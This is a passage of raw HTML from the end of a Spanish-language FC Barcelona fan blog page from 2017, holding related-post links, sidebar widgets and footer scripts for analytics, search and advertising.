28-68t68-28q14 0 23-9t9-23zm224 130q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181zm-1024 574h1536v-128h-1536v128zm1152-574q0-159-112.5-271.5t-271.5-112.5-271.5 112.5-112.5 271.5 112.5 271.5 271.5 112.5 271.5-112.5 112.5-271.5zm-1024-642h384v-128h-384v128zm-128 192h1536v-256h-828l-64 128h-644v128zm1664-256v1280q0 53-37.5 90.5t-90.5 37.5h-1536q-53 0-90.5-37.5t-37.5-90.5v-1280q0-53 37.5-90.5t90.5-37.5h1536q53 0 90.5 37.5t37.5 90.5z"/></svg>          <script type="text/javascript">           jQuery( function($){             if ( $('#flexslider-featured').length ) {               $('#flexslider-featured').on('featured-slider-ready', function() {                 $( '#58d975bb2938a' ).animateSvg();               });             } else { $( '#58d975bb2938a' ).animateSvg( { svg_opacity : 0.3, filter_opacity : 0.5 } ); }           });         </script>          <img class="hu-img-placeholder" src="/default_image_649.png" alt="Luis Suárez ya tiene equipo para cuando deje el Barça" data-hu-post-id="58d975bb2938a" />																			</a> 							</div><!--/.post-thumbnail-->  			<div class="related-inner">  				<h4 class="post-title entry-title"> 					<a href="/archives/93828" rel="bookmark" title="Luis Suárez ya tiene equipo para cuando deje el Barça">Luis Suárez ya tiene equipo para cuando deje el Barça</a> 				</h4><!--/.post-title-->  				<div class="post-meta group"> 					<p class="post-date">    <time class="published updated" datetime="2017-01-22 12:46:48">January 22, 2017</time>  </p>    				</div><!--/.post-meta-->  			</div><!--/.related-inner-->  		</article> 	</li><!--/.related--> 		<li class="related post-hover"> 		<article class="post-103981 post type-post status-publish format-standard hentry category-barcelona-noticias">  			<div class="post-thumbnail"> 				<a href="/archives/103981" title="POLÉMICA: ¡Denuncia del PSG por el arbitraje del Camp Nou!"> 					        <svg class="hu-svg-placeholder thumb-medium-empty" id="58d975bb2e3fd" viewbox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path d="M928 832q0-14-9-23t-23-9q-66 0-113 47t-47 113q0 14 9 23t23 9 23-9 9-23q0-40 28-68t68-28q14 0 23-9t9-23zm224 130q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181zm-1024 574h1536v-128h-1536v128zm1152-574q0-159-112.5-271.5t-271.5-112.5-271.5 112.5-112.5 271.5 112.5 271.5 271.5 112.5 271.5-112.5 112.5-271.5zm-1024-642h384v-128h-384v128zm-128 192h1536v-256h-828l-64 128h-644v128zm1664-256v1280q0 53-37.5 90.5t-90.5 37.5h-1536q-53 0-90.5-37.5t-37.5-90.5v-1280q0-53 37.5-90.5t90.5-37.5h1536q53 0 90.5 37.5t37.5 90.5z"/></svg>          <script type="text/javascript">           jQuery( function($){             if ( $('#flexslider-featured').length ) {               $('#flexslider-featured').on('featured-slider-ready', function() {                 $( '#58d975bb2e3fd' ).animateSvg();               });             } else { $( '#58d975bb2e3fd' ).animateSvg( { svg_opacity : 0.3, filter_opacity : 0.5 } ); }           });         </script>          <img class="hu-img-placeholder" src="/default_image_649.png" alt="POLÉMICA: ¡Denuncia del PSG por el arbitraje del Camp Nou!" data-hu-post-id="58d975bb2e3fd" />																			</a> 							</div><!--/.post-thumbnail-->  			<div class="related-inner">  				<h4 class="post-title entry-title"> 					<a href="/archives/103981" rel="bookmark" title="POLÉMICA: ¡Denuncia del PSG por el arbitraje del Camp Nou!">POLÉMICA: ¡Denuncia del PSG por el arbitraje del Camp Nou!</a> 				</h4><!--/.post-title-->  				<div class="post-meta group"> 					<p class="post-date">    <time class="published updated" datetime="2017-03-14 09:53:00">March 14, 2017</time>  </p>    				</div><!--/.post-meta-->  			</div><!--/.related-inner-->  		</article> 	</li><!--/.related--> 		<li class="related post-hover"> 		<article class="post-94560 post type-post status-publish format-standard hentry category-barcelona-noticias">  			<div class="post-thumbnail"> 				<a href="/archives/94560" title="El &quot;efecto Zidane&quot; se esfuma: Adiós al ansiado &quot;triplete&quot;"> 					        <svg class="hu-svg-placeholder thumb-medium-empty" id="58d975bb319f7" viewbox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path d="M928 832q0-14-9-23t-23-9q-66 0-113 47t-47 113q0 14 9 23t23 9 23-9 9-23q0-40 28-68t68-28q14 0 23-9t9-23zm224 130q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181zm-1024 574h1536v-128h-1536v128zm1152-574q0-159-112.5-271.5t-271.5-112.5-271.5 112.5-112.5 271.5 112.5 271.5 271.5 112.5 271.5-112.5 112.5-271.5zm-1024-642h384v-128h-384v128zm-128 192h1536v-256h-828l-64 128h-644v128zm1664-256v1280q0 53-37.5 90.5t-90.5 37.5h-1536q-53 0-90.5-37.5t-37.5-90.5v-1280q0-53 37.5-90.5t90.5-37.5h1536q53 0 90.5 37.5t37.5 90.5z"/></svg>          <script type="text/javascript">           jQuery( function($){             if ( $('#flexslider-featured').length ) {               $('#flexslider-featured').on('featured-slider-ready', function() {                 $( '#58d975bb319f7' ).animateSvg();               });             } else { $( '#58d975bb319f7' ).animateSvg( { svg_opacity : 0.3, filter_opacity : 0.5 } ); }           });         </script>          <img class="hu-img-placeholder" src="/default_image_649.png" alt="El &quot;efecto Zidane&quot; se esfuma: Adiós al ansiado &quot;triplete&quot;" data-hu-post-id="58d975bb319f7" />																			</a> 							</div><!--/.post-thumbnail-->  			<div class="related-inner">  				<h4 class="post-title entry-title"> 					<a href="/archives/94560" rel="bookmark" title="El &quot;efecto Zidane&quot; se esfuma: Adiós al ansiado &quot;triplete&quot;">El &quot;efecto Zidane&quot; se esfuma: Adiós al ansiado &quot;triplete&quot;</a> 				</h4><!--/.post-title-->  				<div class="post-meta group"> 					<p class="post-date">    <time class="published updated" datetime="2017-01-25 20:22:51">January 25, 2017</time>  </p>    				</div><!--/.post-meta-->  			</div><!--/.related-inner-->  		</article> 	</li><!--/.related--> 		 </ul><!--/.post-related-->    <section id="comments" class="themeform">  	 					<!-- comments closed, no comments --> 		 	 	 </section><!--/#comments-->          </div><!--/.pad-->         </section><!--/.content-->             	<div class="sidebar s1">  		<a class="sidebar-toggle" title="Expand Sidebar"><i class="fa icon-sidebar-toggle"></i></a>  		<div class="sidebar-content">  			  			 			 				<ul class="post-nav group">  		<li class="next"><a href="/archives/106017" rel="next"><i class="fa fa-chevron-right"></i><strong>Next story</strong> <span>&quot;Dybala es un fenómeno, pero no es Messi, Neymar ni Suárez&quot;</span></a></li>  		<li class="previous"><a href="/archives/106020" rel="prev"><i class="fa fa-chevron-left"></i><strong>Previous story</strong> <span>Piqué da el susto en el entrenamiento</span></a></li>  	</ul>   			 			<div id="text-3" class="widget widget_text"><h3 class="widget-title">Sponsored by</h3>			<div class="textwidget"><div id="drall_ads">  <script type="text/javascript">  	bb_bid = "1698993";  	bb_lang = "en-US";  	bb_name = "custom";  	bb_limit = "6";  	bb_format = "bbn";  var uid = '26667';  var wid = '59812';  </script>  <script type="text/javascript" src="http://static.boo-box.com/javascripts/embed.js"></script>      <!-- Piwik -->  <script type="text/javascript">    var _paq = _paq || [];    _paq.push(['trackPageView']);    _paq.push(['enableLinkTracking']);    (function() {      var u="//analytics.drall.com.br/";      _paq.push(['setTrackerUrl', u+'piwik.php']);      _paq.push(['setSiteId', 21]);      var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];      g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);    })();  </script>  <noscript><p><img src="//analytics.drall.com.br/piwik.php?idsite=21" style="border:0;" alt="" /></p></noscript>  <!-- End Piwik Code -->  </div></div> 		</div><div id="text-4" class="widget widget_text"><h3 class="widget-title">Search</h3>			<div class="textwidget"><div>  <script>    (function() {      var cx = '013704388734460037250:lz3igs6kewk';      var gcse = document.createElement('script');      gcse.type = 'text/javascript';      gcse.async = true;      gcse.src = 'https://cse.google.com/cse.js?cx=' + cx;      var s = document.getElementsByTagName('script')[0];      s.parentNode.insertBefore(gcse, s);    })();  </script>  <gcse:search></gcse:search>  </div></div> 		</div>		<div id="recent-posts-2" class="widget widget_recent_entries">		<h3 class="widget-title">Recent Posts</h3>		<ul> 					<li> 				<a href="/archives/106019">El falso rumor que pretende dañar la imagen de Messi</a> 						</li> 					<li> 				<a href="/archives/106018">POLÉMICA: ¡Aseguran que la FIFA puede sancionar a Messi!</a> 						</li> 					<li> 				<a href="/archives/106017">&quot;Dybala es un fenómeno, pero no es Messi, Neymar ni Suárez&quot;</a> 						</li> 					<li> 				<a href="/archives/106016">Entradas &#8211; Tickets International Champions Cup 2017</a> 						</li> 					<li> 				<a href="/archives/106020">Piqué da el susto en el entrenamiento</a> 						</li> 				</ul> 		</div>		<div id="categories-2" class="widget widget_categories"><h3 class="widget-title">Categories</h3>		<ul> 	<li class="cat-item cat-item-5"><a href="/archives/category/all-about-fc-barcelona" >All About FC Barcelona</a> </li> 	<li class="cat-item cat-item-2"><a href="/archives/category/barcelona-football-blog" >Barcelona Football Blog</a> </li> 	<li class="cat-item cat-item-4"><a href="/archives/category/barcelona-noticias" >Barcelona Noticias</a> </li> 	<li class="cat-item cat-item-18"><a href="/archives/category/daily-mail" >Daily Mail</a> </li> 	<li class="cat-item cat-item-20"><a href="/archives/category/diario-as" >Diario As</a> </li> 	<li class="cat-item cat-item-21"><a href="/archives/category/diario-sport" >Diario Sport</a> </li> 	<li class="cat-item cat-item-25"><a href="/archives/category/el-blog-de-confiesa" >El Blog de Confiesa</a> </li> 	<li class="cat-item cat-item-23"><a href="/archives/category/espn" >ESPN</a> </li> 	<li class="cat-item cat-item-12"><a href="/archives/category/fc-barcelona-twitter" >FC Barcelona &#8211; Twitter</a> </li> 	<li class="cat-item cat-item-10"><a href="/archives/category/football-co-uk" >Football.co.uk</a> </li> 	<li class="cat-item cat-item-26"><a href="/archives/category/mes-que-un-blog" >Mes que un blog</a> </li> 	<li class="cat-item cat-item-19"><a href="/archives/category/mundo-deportivo" >Mundo Deportivo</a> </li> 	<li class="cat-item cat-item-9"><a href="/archives/category/new-york-times" >New York Times</a> </li> 	<li class="cat-item cat-item-11"><a href="/archives/category/total-barca" >Total Barça</a> </li> 		</ul> </div><div id="text-2" class="widget widget_text">			<div class="textwidget"><!-- Piwik -->  <script type="text/javascript">    var _paq = _paq || [];    _paq.push(['trackPageView']);    _paq.push(['enableLinkTracking']);    (function() {      var u="//analytics.drall.com.br/";      _paq.push(['setTrackerUrl', u+'piwik.php']);      _paq.push(['setSiteId', 22]);      var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];      g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);    })();  </script>  <noscript><p><img src="//analytics.drall.com.br/piwik.php?idsite=22" style="border:0;" alt="" /></p></noscript>  <!-- End Piwik Code -->  </div> 		</div> 		</div><!--/.sidebar-content-->  	</div><!--/.sidebar-->  	<div class="sidebar s2">    	<a class="sidebar-toggle" title="Expand Sidebar"><i class="fa icon-sidebar-toggle"></i></a>    	<div class="sidebar-content">    		  		  		  		  		<div id="cc_tables_widget-2" class="widget example"><h3 class="widget-title">Next match</h3><div class="cleanslate crowdscores-widget"  id="nextmatch-widget"  data-team-id="382"  data-widget-key="" ></div></div><div id="cc_tables_widget-3" class="widget example"><h3 class="widget-title">Live Scores</h3><div class="cleanslate crowdscores-widget"  id="livescores-widget"  data-type="results"  data-max-matches="5"  data-team-id="382"  data-widget-key="" ></div></div><div id="cc_tables_widget-4" class="widget example"><h3 class="widget-title">Table &#8211; La Liga</h3><div class="cleanslate crowdscores-widget"  id="leaguetable-widget"  data-round-ids="119"  data-team-id="382"  data-widget-key="" ></div></div><div id="youtube-channel-2" class="widget widget_youtube-channel"><h3 class="widget-title">Last videos</h3><div class="youtube_channel default responsive ytc_display_playlist"><div class="ytc_video_container ytc_video_1 ytc_video_single ytc_playlist_only ar16_9"><div class="fluid-width-video-wrapper"><iframe src="//www.youtube.com/embed/videoseries?list=UU14UlmYlSNiQCBe9Eookf_A" width="306" height="172" frameborder="0"></iframe></div><!-- .fluid-width-video-wrapper --></div><!-- .ytc_video_container --><div class="clearfix"></div><div class="ytc_link"><p><a href="https://www.youtube.com/c/e-n5VptaDkG6fk1esJJNPw" title="Visit our YouTube channel">Visit our YouTube channel</a></p></div></div><!-- .youtube_channel --><div class="clearfix"></div></div>  	</div><!--/.sidebar-content-->    </div><!--/.sidebar-->          </div><!--/.main-inner-->       </div><!--/.main-->     </div><!--/.container-inner-->   </div><!--/.container-->     <footer id="footer">                     <section class="container" id="footer-bottom">       <div class="container-inner">          <a id="back-to-top" href="#"><i class="fa fa-angle-up"></i></a>          <div class="pad group">            <div class="grid one-half">                                      <div id="copyright">                               <p>BLOG TIKI-TAKA &copy; 2017. All Rights Reserved.</p>                           </div><!--/#copyright-->                            <div id="credit" style="">Developed by <b><a href="http://www.drall.com.br" style="color:#d66000" target="_blank">Drall Consulting</a></b></div><!--/#credit-->                        </div>            <div class="grid one-half last">                                                   </div>          </div><!--/.pad-->        </div><!--/.container-inner-->     </section><!--/.container-->    </footer><!--/#footer-->  </div><!--/#wrapper-->  <!-- YouTube Channel 3 --><script type="text/javascript">function ytc_init_MPAU() {jQuery('.ytc-lightbox').magnificPopupAU({disableOn:320,type:'iframe',mainClass:'ytc-mfp-lightbox',removalDelay:160,preloader:false,fixedContentPos:false});}jQuery(window).on('load',function(){ytc_init_MPAU();});jQuery(document).ajaxComplete(function(){ytc_init_MPAU();});</script><script type='text/javascript' src='/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript' src='/wp-content/plugins/youtube-channel/assets/lib/magnific-popup/jquery.magnific-popup.min.js'></script> <script type='text/javascript' src='/wp-includes/js/underscore.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var HUParams = {"_disabled":[],"SmoothScroll":{"Enabled":true,"Options":{"touchpadSupport":false}},"centerAllImg":"1","timerOnScrollAllBrowsers":"1","extLinksStyle":null,"extLinksTargetExt":null,"extLinksSkipSelectors":{"classes":["btn","button"],"ids":[]},"imgSmartLoadEnabled":null,"imgSmartLoadOpts":{"parentSelectors":[".container .content",".container .sidebar","#footer","#header-widgets"],"opts":{"excludeImg":[".tc-holder-img"],"fadeIn_options":100}},"goldenRatio":"1.618","gridGoldenRatioLimit":"350","vivusSvgSpeed":"300","isDevMode":""}; /* ]]> */ </script> <script type='text/javascript' src='/wp-content/themes/hueman/assets/front/js/scripts.min.js'></script> <script type='text/javascript' src='/wp-includes/js/wp-embed.min.js'></script> <!--[if lt IE 9]> <script src="http://blogtikitaka.centrodouniverso.com.br/wp-content/themes/hueman/assets/front/js/ie/respond.js"></script> <![endif]--> </body> </html> <style> .site-description{     color:white; } </style> 